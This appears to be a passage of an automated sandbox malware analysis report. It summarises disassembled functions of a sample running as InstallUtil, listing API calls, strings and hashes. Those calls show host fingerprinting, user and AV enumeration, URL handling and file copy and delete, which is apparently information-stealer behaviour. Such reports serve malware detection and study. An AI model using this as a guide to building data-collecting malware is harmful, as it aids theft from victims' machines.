                                                                                                                  • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                  Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                    • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                  • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                  • String ID: Unknown
                                                                                                                  • API String ID: 2781187439-1654365787
                                                                                                                  • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                  • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                  • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                  • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                  Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                  • wsprintfA.USER32 ref: 0041117A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                  • String ID: %d MB
                                                                                                                  • API String ID: 3644086013-2651807785
                                                                                                                  • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                  • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                  • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                  • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                  Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreatePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2024441833-0
                                                                                                                  • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                  • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                  • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                  • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                  Function 6C64C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C64C947
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C64C969
                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C64C9A9
                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C64C9C8
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C64C9E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492448452.000000006C630000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492911108.000000006C6BE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492934435.000000006C6C2000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4191843772-0
                                                                                                                  • Opcode ID: d176ed26cd60ac216d5ddf513672cdcf9632d61d43f1d80c38ea9eef5f8e784b
                                                                                                                  • Instruction ID: 558792187c4795614cffb255d072b4e43667bf12cfd9a8a857d639944973e12d
                                                                                                                  • Opcode Fuzzy Hash: d176ed26cd60ac216d5ddf513672cdcf9632d61d43f1d80c38ea9eef5f8e784b
                                                                                                                  • Instruction Fuzzy Hash: 61212935701214BBDB04AA3ADCC4BAE73B9AB86344F50812AF903A7B40DB705C04879D
                                                                                                                  Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                  • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                  • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1274457161-0
                                                                                                                  • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                  • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                  • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                  • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                  Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3466090806-0
                                                                                                                  • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                  • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                  • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                  • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                  Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                  Strings
                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                  • API String ID: 2929475105-3463377506
                                                                                                                  • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                  • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                  • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                  • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                  Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                  • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog3_catchlstrlen
                                                                                                                  • String ID: ERROR
                                                                                                                  • API String ID: 591506033-2861137601
                                                                                                                  • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                  • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                  • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                  • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                  Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                  • String ID: =A
                                                                                                                  • API String ID: 3183270410-2399317284
                                                                                                                  • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                  • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                  • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                  • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                  Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
